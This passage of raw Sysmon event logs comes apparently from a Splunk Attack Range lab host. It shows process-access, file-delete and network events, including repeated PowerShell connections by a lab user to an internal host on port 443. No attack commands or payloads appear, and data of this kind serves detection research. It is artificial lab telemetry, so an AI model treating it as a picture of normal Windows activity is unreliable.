Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.506{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADF351BC966B3EABB321A498BF28A8B,SHA256=49F08BE0E5BD1AE12D4394AAAC071D4758DF31DBC10F3747DF5BE227BA04C677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:09.864{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50663-false10.0.1.12-8000- 10341000x800000000000000036498611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B736824DA72202F9EE4CD41B4F2159F9,SHA256=1CEA0BC0F875D593E4A4EEA70567F1619524512386368EBA48659E2168DAD4F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8E39F244BC54EA15B046A95AA22983,SHA256=5B3CB0EE353D0FA29844BF0905E7AE0C76A3BC08433FB788526F23F66E125C95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.174{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:10.135{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50664-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99CE27137596E512AF62AD7154028BC2,SHA256=83AE2858E185598D149895E2CDB38AB5B4847C56517F9BFD66DD9A1FD37C9545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=852398A99F0FC61E000326EADFFD88AB,SHA256=3F2A07ECA2461AACD9CEA1C9072E8A474B5B34C9C6D7B4283A285DCE0C0F43FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:41.430{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E8B71B018A8E0171F9A5EA4AC79BCD,SHA256=CD800BE914D54D1D2B4CB5C86B49496B60F248DE242D4259AA75BC32F07DF9A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:42.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C7F96E0C3783CA57085D1AACD96033,SHA256=F17CB58F9D122790D94E198F86F4C965ADE9B3367AA599F38F95E58459193EBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:43.490{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE680F63CDB77EA722B86FA002A5DE4,SHA256=8D6A94C44E3A4F9B3D6960DBE262E95758B602729A1035009EF0D6C21C2C5A3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:44.507{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6BF43FD53B21D8525F125922468B236,SHA256=5905D7AE102B3967E8B090E73E5935BB73A00F1D0860C5D7B86E534661C18E4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:16.133{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50666-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:15.880{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50665-false10.0.1.12-8000- 23542300x800000000000000036498621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.641{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BCDB9D94141DE2BB21DB65F6B31299EF,SHA256=E12CCC1B6EB5ABCEA2977F99F58478C94A777A6D5A252FCEE4D144FBA6D9DC8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC61739D1E826DECB76359652DAAD62,SHA256=E076CDFC43155D61668F70D74FD564B8E1A13DF3588CB312CE9B0FA9F8C127ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:46.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B713471150EBE27F8F2522FECA7A0BCD,SHA256=7F0F227A563B5A50E2DA0382E9449030DF89BF99805DE75831102DDA9EFB0156,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:47.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43081A2363EE99EB78F0D672152CFA27,SHA256=849C8B0199FFF97C42F1EE7F5766304C0EBE73A38051C2A506254127B0865E4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:48.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DAB0B76AF69F3E8FE2000729947E76C,SHA256=B2CAD3B98818364D7AB258908FDAE78C751DD9E441BE78ECE8AF59E78AA314B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:49.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F41A0C41ABB69BCE5192E0BFC135FF6,SHA256=7D580D104AE25FC10D48169372A9DB706E2D0945AFC6B3FF2145BCE1607961B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:50.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5DAF5BFBBC2492C13715CD76E25CE0,SHA256=DD379953D55472CDA934FB0E4092FCCFCF060440D7BF495E19A52C2558C71052,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:51.734{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E727C3C8260496B7579C3F07C7D10FD6,SHA256=DC05008B0340C8174859AA39C5614EBB64127FCD6364999312FEE0FBD77C86EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:51.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5480E472BD8F5B17835E87ACEF5B2504,SHA256=BA5C60C5F1F340D3DC53710577D7F079F0044187AA8D26457BC4A2B3970D1BE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:52.748{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4532304A62066B453097610428B1029F,SHA256=024C657262AE22D4C27F4EC056D4B5AED3DBB96DAADF534E27FC9740FD221B71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:22.141{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50668-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:21.857{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50667-false10.0.1.12-8000- 23542300x800000000000000036498634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:53.796{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B84C8B4C0DA088F38736FEB4F3D37A9,SHA256=AB945D3D480324087ADAE8C6642FF1B0AB3631936503E1D934793B1BA7AA5446,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:54.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ECC420FE08DBE2E56DACEA787434635,SHA256=90D8D683C05DD1B902073CEA58D2201969383A26C91DEB25411BE1A8C7F04E4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:55.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 